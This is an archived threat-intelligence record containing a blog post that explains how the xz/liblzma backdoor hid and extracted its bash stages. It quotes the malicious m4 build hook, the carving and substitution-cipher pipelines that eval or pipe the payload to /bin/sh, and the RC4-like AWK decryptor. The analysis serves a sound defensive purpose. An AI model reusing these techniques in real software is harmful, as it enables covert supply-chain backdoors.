{
	"id": "e758a841-0dca-44fa-abc2-196ab47b2840",
	"created_at": "2026-04-10T03:21:38.119967Z",
	"updated_at": "2026-04-10T03:22:18.270692Z",
	"deleted_at": null,
	"sha1_hash": "d53fb36cbaf38884e23755941c5ec17c1bc4af07",
	"title": "xz/liblzma: Bash-stage Obfuscation Explained",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 270804,
	"plain_text": "xz/liblzma: Bash-stage Obfuscation Explained\r\nArchived: 2026-04-10 03:13:13 UTC\r\nYesterday Andres Freund emailed oss-security@ informing the community of the discovery of a backdoor in\r\nxz/liblzma, which affected OpenSSH server (huge respect for noticing and investigating this). Andres' email is an\r\namazing summary of the whole drama, so I'll skip that. While admittedly most juicy and interesting part is the\r\nobfuscated binary with the backdoor, the part that caught my attention – and what this blogpost is about – is the\r\ninitial part in bash and the simple-but-clever obfuscation methods used there. Note that this isn't a full description\r\nof what the bash stages do, but rather a write down of how each stage is obfuscated and extracted.\r\nP.S. Check the comments under this post, there are some good remarks there.\r\nBefore we begin\r\nWe have to start with a few notes.\r\nFirst of all, there are two versions of xz/liblzma affected: 5.6.0 and 5.6.1. Differences between them are minor, but\r\ndo exist. I'll try to cover both of these.\r\nSecondly, the bash part is split into three (four?) stages of interest, which I have named Stage 0 (that's the start\r\ncode added in m4/build-to-host.m4) to Stage 2. I'll touch on the potential \"Stage 3\" as well, though I don't think it\r\nhas fully materialized yet.\r\nPlease also note that the obfuscated/encrypted stages and later binary backdoor are hidden in two test files:\r\ntests/files/bad-3-corrupt_lzma2.xz and tests/files/good-large_compressed.lzma.\r\nStage 0\r\nAs pointed out by Andres, things start in the m4/build-to-host.m4 file. Here are the relevant pieces of code:\r\n... gl_[$1]_config='sed \\\"r\\n\\\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d\r\n2\u003e/dev/null' ... gl_path_map='tr \"\\t \\-_\" \" \\t_\\-\"' ...\r\nThis code, which I believe is run somewhere during the build process, extracts Stage 1 script. Here's an overview:\r\n1. 
Bytes from tests/files/bad-3-corrupt_lzma2.xz are read from the file and outputted to standard output /\r\ninput of the next step – this chaining of steps is pretty typical throughout the whole process. After\r\neverything is read, a newline (\\n) is added as well.\r\n2. The second step is to run tr (translate, as in \"map characters to other characters\", or \"substitute characters to\r\ntarget characters\"), which basically changes selected characters (or byte values) to other characters (other\r\nbyte values). Let's work through a few features and examples, as this will be important later.\r\nThe most basic use looks like this:\r\necho \"BASH\" | tr \"ABCD\" \"1234\"\r\n21SH\r\nWhat happened here is \"A\" being mapped to (translated to) \"1\", \"B\" to \"2\", and so on.\r\nhttps://gynvael.coldwind.pl/?lang=en\u0026id=782\r\nPage 1 of 7\n\nInstead of characters we can also specify ranges of characters. In our initial example we would just change\r\n\"ABCD\" to \"A-D\", and do the same with the target character set: \"1-4\":\r\necho \"BASH\" | tr \"A-D\" \"1-4\"\r\n21SH\r\nSimilarly, instead of specifying characters, we can specify their ASCII codes... in octal. So \"A-D\" could be\r\nchanged to \"\\101-\\104\", and \"1-4\" could become \"\\061-\\064\":\r\necho \"BASH\" | tr \"\\101-\\104\" \"\\061-\\064\"\r\n21SH\r\nThis can also be mixed - e.g. \"ABCD1-9\\111-\\115\" would create a set of A, B, C, D, then numbers from 1\r\nto 9, and then letters I (octal code 111), J, K, L, M (octal code 115). 
This is true both for the input\r\ncharacter set and the target character set.\r\nGoing back to the code, we have tr \"\\t \\-_\" \" \\t_\\-\", which does the following substitution in bytes streamed\r\nfrom the tests/files/bad-3-corrupt_lzma2.xz file:\r\n0x09 (\\t) is replaced with 0x20,\r\n0x20 (space) is replaced with 0x09,\r\n0x2d (-) is replaced with 0x5f,\r\n0x5f (_) is replaced with 0x2d.\r\nThis actually \"uncorrupts\" the bad-3-corrupt_lzma2.xz, which forms a proper xz stream again.\r\n3. In the last step of this stage the fixed xz byte stream is extracted with errors being ignored (the stream\r\nseems to be truncated, but that doesn't matter as the whole meaningful output has already been written out).\r\nThe outcome of this is the Stage 1 script, which is promptly executed.\r\nBy the way...\r\nIf you want to improve your binary file and protocol skills, check out the workshop I'll be running between April and\r\nJune → Mastering Binary Files and Protocols: The Complete Journey\r\nStage 1\r\nIn Andres' email that's the bash file starting with \"####Hello####\", which is pretty short, so let's present it here\r\nwith differences between 5.6.0 and 5.6.1 marked with black background.\r\n####Hello####\r\n# a few binary bytes here, but as it's a comment they are ignored\r\n[ ! $(uname) = \"Linux\" ] \u0026\u0026 exit 0\r\n[ ! $(uname) = \"Linux\" ] \u0026\u0026 exit 0\r\n[ ! $(uname) = \"Linux\" ] \u0026\u0026 exit 0\r\n[ ! $(uname) = \"Linux\" ] \u0026\u0026 exit 0\r\n[ ! 
$(uname) = \"Linux\" ] \u0026\u0026 exit 0\r\neval `grep ^srcdir= config.status`\r\nif test -f ../../config.status;then\r\neval `grep ^srcdir= ../../config.status`\r\nsrcdir=\"../../$srcdir\"\r\nfi\r\nexport i=\"((head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +939)\";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr \"\\114-\\321\\322-\\377\\35-\\47\\14-\\34\\0-\\13\\50-\\113\" \"\\0-\\377\")|xz -F raw --lzma1 -dc|/bin/sh\r\n####World####\r\nThe first difference is the random bytes in the comment on the second line.\r\nIn version 5.6.0 it's 86 F9 5A F7 2E 68 6A BC,\r\nand in 5.6.1 that's E5 55 89 B7 24 04 D8 17.\r\nI'm not sure if these differences are meaningful in any way, but wanted to note it.\r\nThe check 
whether the script is running on Linux was added in 5.6.1, and the fact that it's repeated 5 times makes\r\nthis pretty funny – was someone like \"oops, forgot this last time and it caused issues, better put it in 5 times as an\r\natonement!\"?\r\nWe'll get back to the remaining differences later, but for now let's switch to the Stage 2 extraction code, which is that\r\nhuge export i=... line with a lot of heads. As previously, let's go step by step:\r\n1. The export i=... at the beginning is basically just a function \"definition\". It's being invoked in step 3 (as\r\nwell as in Stage 2), so we'll get to it in a sec (also, it's simpler than it looks).\r\n2. The first actual step in the extraction process of Stage 2 is the decompression (xz -dc) of the good-large_compressed.lzma file to standard output. This, as previously, starts a chain of outputs of one step\r\nbeing used as inputs in the next one.\r\n3. Now we get to the i function invocation (eval $i). This function is basically a chain of head calls that either\r\noutput the next N bytes, or skip (ignore) the next N bytes.\r\nAt the very beginning we have this: (head -c +1024 \u003e/dev/null). The -c +1024 option there tells head to\r\nread and output only the next 1024 bytes from the incoming data stream (note that the + there is ignored, it\r\ndoesn't do anything, unlike in tail). However, since the output is redirected in this case to /dev/null, what\r\nwe effectively get is \"skip the next 1024 bytes\".\r\nThis is a good moment to note that if we look at the first 1024 bytes in the uncompressed data stream from\r\nthe good-large_compressed.lzma file, it's basically the \"A\" character (byte 0x41) repeated 1024 times. 
To\r\nadd a bit of foreshadowing, after the first 1024 characters there is some binary data.\r\nThe next head call looks almost identical, with a different length: head -c +2048. Note that in this case\r\nthe output is not ignored – it will actually be passed to the next step as input.\r\nAnd this pattern repeats: 1024 bytes are ignored, then 2048 bytes are outputted, 1024 bytes ignored, 2048\r\noutputted... and so on until we get to the very end of the file where only 724 bytes (in 5.6.0) or 939 bytes\r\n(in 5.6.1) are outputted.\r\nTo visualize this, here's the actual input data that's processed by this set of head calls. Byte 0 is on top-left\r\nof the file; each column represents 256 bytes of the file as grayscale. Note the \"empty gray\" regions\r\nbetween the high entropy (\"noisy\") areas – what this part of the script does is basically just removing the\r\nempty regions and merging the regions with actual data together.\r\n[Figure omitted: the input data rendered as grayscale columns]\r\n4. In the next step – tail -c +31233 – the initial portion of the data is discarded (spoiler: it hides the binary\r\nbackdoor, which is extracted in the next Stage, so it's not needed now). In 5.6.0 that would be the first\r\n31264 bytes and in 5.6.1 that's 31232 (the off-by-one difference is because tail -c +N means \"start\r\noutputting from byte N\" and not \"ignore first N bytes\").\r\n5. Step 5 revisits the tr command, which in this case is used as a very simple substitution cipher, with the key\r\n(byte value mapping) being different in 5.6.0 and 5.6.1:\r\n5.6.0: tr \"\\5-\\51\\204-\\377\\52-\\115\\132-\\203\\0-\\4\\116-\\131\" \"\\0-\\377\"\r\n5.6.1: tr \"\\114-\\321\\322-\\377\\35-\\47\\14-\\34\\0-\\13\\50-\\113\" \"\\0-\\377\"\r\nAs per the previous explanation, this basically means that (for 5.6.0) a byte of value 5 will be substituted\r\nwith a byte of value 0, a byte of value 6 will be substituted with a byte of value 1, and so on. 
In each case there\r\nare 6 ranges which map to the whole 0 - 255 (that's 377 octal) range.\r\n6. In the last step the deciphered data is decompressed (xz -F raw --lzma1 -dc) and the resulting Stage 2 is\r\npromptly executed.\r\nStage 2\r\nStage 2 is the infected.txt file attached by Andres in the original email (that's the 5.6.0 version btw). There's a lot\r\ngoing on in this bash script, as this is where the actual compilation process modification happens.\r\nFrom the perspective of obfuscation analysis, there are three interesting fragments to this script, two of which\r\nappear only in the 5.6.1 version. Let's start with them, as they are also simpler.\r\nStage 2 \"extension\" mechanism\r\nFragment 1:\r\nvs=`grep -broaF '~!:_ W' $srcdir/tests/files/ 2\u003e/dev/null` if test \"x$vs\" != \"x\" \u003e /dev/null\r\n2\u003e\u00261;then f1=`echo $vs | cut -d: -f1` if test \"x$f1\" != \"x\" \u003e /dev/null 2\u003e\u00261;then start=`expr $(echo\r\n$vs | cut -d: -f2) + 7` ve=`grep -broaF '|_!{ -' $srcdir/tests/files/ 2\u003e/dev/null` if test \"x$ve\" !=\r\n\"x\" \u003e /dev/null 2\u003e\u00261;then f2=`echo $ve | cut -d: -f1` if test \"x$f2\" != \"x\" \u003e /dev/null 2\u003e\u00261;then [ ! \"x$f2\" = \"x$f1\" ] \u0026\u0026 exit 0 [ ! 
-f $f1 ] \u0026\u0026 exit 0 end=`expr $(echo $ve | cut -d: -f2) - $start` eval\r\n`cat $f1 | tail -c +${start} | head -c +${end} | tr \"\\5-\\51\\204-\\377\\52-\\115\\132-\\203\\0-\\4\\116-\\131\"\r\n\"\\0-\\377\" | xz -F raw --lzma2 -dc` fi fi fi fi\r\nFragment 3:\r\nvs=`grep -broaF 'jV!.^%' $top_srcdir/tests/files/ 2\u003e/dev/null` if test \"x$vs\" != \"x\" \u003e /dev/null\r\n2\u003e\u00261;then f1=`echo $vs | cut -d: -f1` if test \"x$f1\" != \"x\" \u003e /dev/null 2\u003e\u00261;then start=`expr $(echo\r\n$vs | cut -d: -f2) + 7` ve=`grep -broaF '%.R.1Z' $top_srcdir/tests/files/ 2\u003e/dev/null` if test \"x$ve\"\r\n!= \"x\" \u003e /dev/null 2\u003e\u00261;then f2=`echo $ve | cut -d: -f1` if test \"x$f2\" != \"x\" \u003e /dev/null 2\u003e\u00261;then [\r\n! \"x$f2\" = \"x$f1\" ] \u0026\u0026 exit 0 [ ! -f $f1 ] \u0026\u0026 exit 0 end=`expr $(echo $ve | cut -d: -f2) - $start`\r\neval `cat $f1 | tail -c +${start} | head -c +${end} | tr \"\\5-\\51\\204-\\377\\52-\\115\\132-\\203\\0-\\4\\116-\\131\" \"\\0-\\377\" | xz -F raw --lzma2 -dc` fi fi fi fi\r\nThese two fragments are pretty much identical, so let's handle both of them at the same time. Here's what they do:\r\n1. First of all they search (grep -broaF) the tests/files/ directory for files which contain the following bytes\r\n(signatures):\r\nFragment 1: \"~!:_ W\" and \"|_!{ -\"\r\nFragment 3: \"jV!.^%\" and \"%.R.1Z\"\r\nNote that what's actually outputted by grep in this case has the following format: file_name:offset:signature. For example:\r\n$ grep -broaF \"XYZ\"\r\ntestfile:9:XYZ\r\n2. If both signatures are found, the offset of each is extracted (cut -d: -f2, which takes the 2nd field assuming : is\r\nthe field delimiter). The first offset + 7 is saved as $start, and the second offset minus $start is saved as $end, so\r\n$end is really a length. Note that the script exits unless both signatures were found in the same file ($f1 and $f2\r\nhave to be equal).\r\n3. Once the script has the $start and $end values, it carves out that part of the file-that-had-the-first-signature:\r\ncat $f1 | tail -c +${start} | head -c +${end}\r\n4. 
And what follows is first the substitution cipher (using the 5.6.0 version key from Stage 1 btw): tr \"\\5-\\51\\204-\\377\\52-\\115\\132-\\203\\0-\\4\\116-\\131\" \"\\0-\\377\"\r\n5. and then decompressing the data for it to be promptly executed: eval `... | xz -F raw --lzma2 -dc`\r\nNote that neither of the investigated TAR archives (5.6.0 and 5.6.1) contained any files with any of the\r\nsignatures. This whole thing basically looks like an \"extension/patching\" system that would allow adding future\r\nscripts to be run in the context of Stage 2, without having to modify the original payload-carrying test files. Which\r\nmakes sense, as modifying the \"bad\" and \"good\" test files over and over again is pretty suspicious. So the plan\r\nseemed to be to just add new test files instead, which would have been picked up, deciphered, and executed.\r\nStage 2 backdoor extraction\r\nAs pointed out by Andres in the original e-mail, at some point an .o file is extracted and woven into the\r\ncompilation/linking process. 
The following code is responsible for that (again, differences between versions are\r\nmarked with black background):\r\nN=0 W=88664 else N=88664 W=0 fi xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed \"s/\\(.\\)/\\1\\n/g\" | LC_ALL=C awk 'BEGIN{FS=\"\\n\";RS=\"\\n\";ORS=\"\";m=256;for(i=0;i\u003cm;i++){t[sprintf(\"x%c\",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l\u003c8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t[\"x\" (NF\u003c1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf \"%c\",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N \u003e /dev/null 2\u003e\u00261) \u0026\u0026 head -c +$W) \u003e liblzma_la-crc64-fast.o || true\r\nThe differences between versions boil down to the size of the compressed-but-somewhat-mangled payload – that's\r\n88792 in 5.6.0 and 88664 in 5.6.1 – and one value change in the AWK script, to which we'll get in a second.\r\nAs in all previous cases, the extraction process is a chain of commands, where the output of one command is the\r\ninput of the next one. Furthermore, some steps are actually identical to those in Stage 1 (which makes sense, since – as\r\nI've mentioned – the binary payload resides in the previously ignored part of the \"good\" file data). Let's take a\r\nlook:\r\n1. The first step is identical to step 2 in Stage 1 – the tests/files/good-large_compressed.lzma file is being\r\nextracted with xz.\r\n2. The second step is in turn identical to step 3 in Stage 1 – that was the \"a lot of heads\" \"function\" invocation.\r\n3. And here is where things diverge. First of all, the previous output gets mangled with the sed command:\r\nLC_ALL=C sed \"s/\\(.\\)/\\1\\n/g\"\r\nWhat this does is put a newline character after each byte\r\n(with the exception of the new line character itself). 
So what we end up with on the output is a byte-per-line situation (yes, there is a lot of mixing \"text\" and \"binary\" approaches to files in here). This is actually\r\nneeded by the next step.\r\n4. The next step is an AWK script (that's a simple scripting language for text processing) which does – as mak\r\npointed out to me – RC4...ish decryption of the input stream. Here's a prettified version of that script:\r\nBEGIN { # Initialization part.\r\n  FS = \"\\n\"; # Some AWK settings.\r\n  RS = \"\\n\";\r\n  ORS = \"\";\r\n  m = 256;\r\n  for(i=0;i\u003cm;i++) {\r\n    t[sprintf(\"x%c\", i)] = i;\r\n    key[i] = ((i * 7) + 5) % m; # Creating the cipher key.\r\n  }\r\n  i=0; # Skipping 4096 first bytes of the output PRNG stream.\r\n  j=0; # ↑ it's a typical RC4 thing to do.\r\n  for(l = 0; l \u003c 4096; l++) { # 5.6.1 uses 8192 instead.\r\n    i = (i + 1) % m;\r\n    a = key[i];\r\n    j = (j + a) % m;\r\n    key[i] = key[j];\r\n    key[j] = a;\r\n  }\r\n}\r\n{ # Decryption part.\r\n  # Getting the next byte.\r\n  v = t[\"x\" (NF \u003c 1 ? RS : $1)];\r\n  # Iterating the RC4 PRNG.\r\n  i = (i + 1) % m;\r\n  a = key[i];\r\n  j = (j + a) % m;\r\n  b = key[j];\r\n  key[i] = b;\r\n  key[j] = a;\r\n  k = key[(a + b) % m];\r\n  # As pointed out by @nugxperience, RC4 originally XORs the encrypted byte\r\n  # with the key, but here for some reason add is used instead (might be an AWK thing).\r\n  printf \"%c\", (v + k) % m\r\n}\r\n5. After the input has been decrypted, it gets decompressed: xz -dc --single-stream\r\n6. And then bytes from N (0) to W (~86KB) are being carved out using the same usual head tricks, and saved\r\nas liblzma_la-crc64-fast.o – which is the final binary backdoor.\r\n((head -c +$N \u003e /dev/null 2\u003e\u00261) \u0026\u0026 head -c +$W) \u003e liblzma_la-crc64-fast.o\r\nSummary\r\nSomeone put a lot of effort into making this look pretty innocent and decently hidden. 
From binary test files used\r\nto store payload, to file carving, substitution ciphers, and an RC4 variant implemented in AWK all done with just\r\nstandard command line tools. And all this in 3 stages of execution, and with an \"extension\" system to future-proof\r\nthings and not have to change the binary test files again. I can't help but wonder (as I'm sure is the rest of our\r\nsecurity community) – if this was found by accident, how many things still remain undiscovered.\r\nSource: https://gynvael.coldwind.pl/?lang=en\u0026id=782",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://gynvael.coldwind.pl/?lang=en\u0026id=782"
	],
	"report_names": [
		"?lang=en\u0026id=782"
	],
	"threat_actors": [],
	"ts_created_at": 1775791298,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d53fb36cbaf38884e23755941c5ec17c1bc4af07.pdf",
		"text": "https://archive.orkl.eu/d53fb36cbaf38884e23755941c5ec17c1bc4af07.txt",
		"img": "https://archive.orkl.eu/d53fb36cbaf38884e23755941c5ec17c1bc4af07.jpg"
	}
}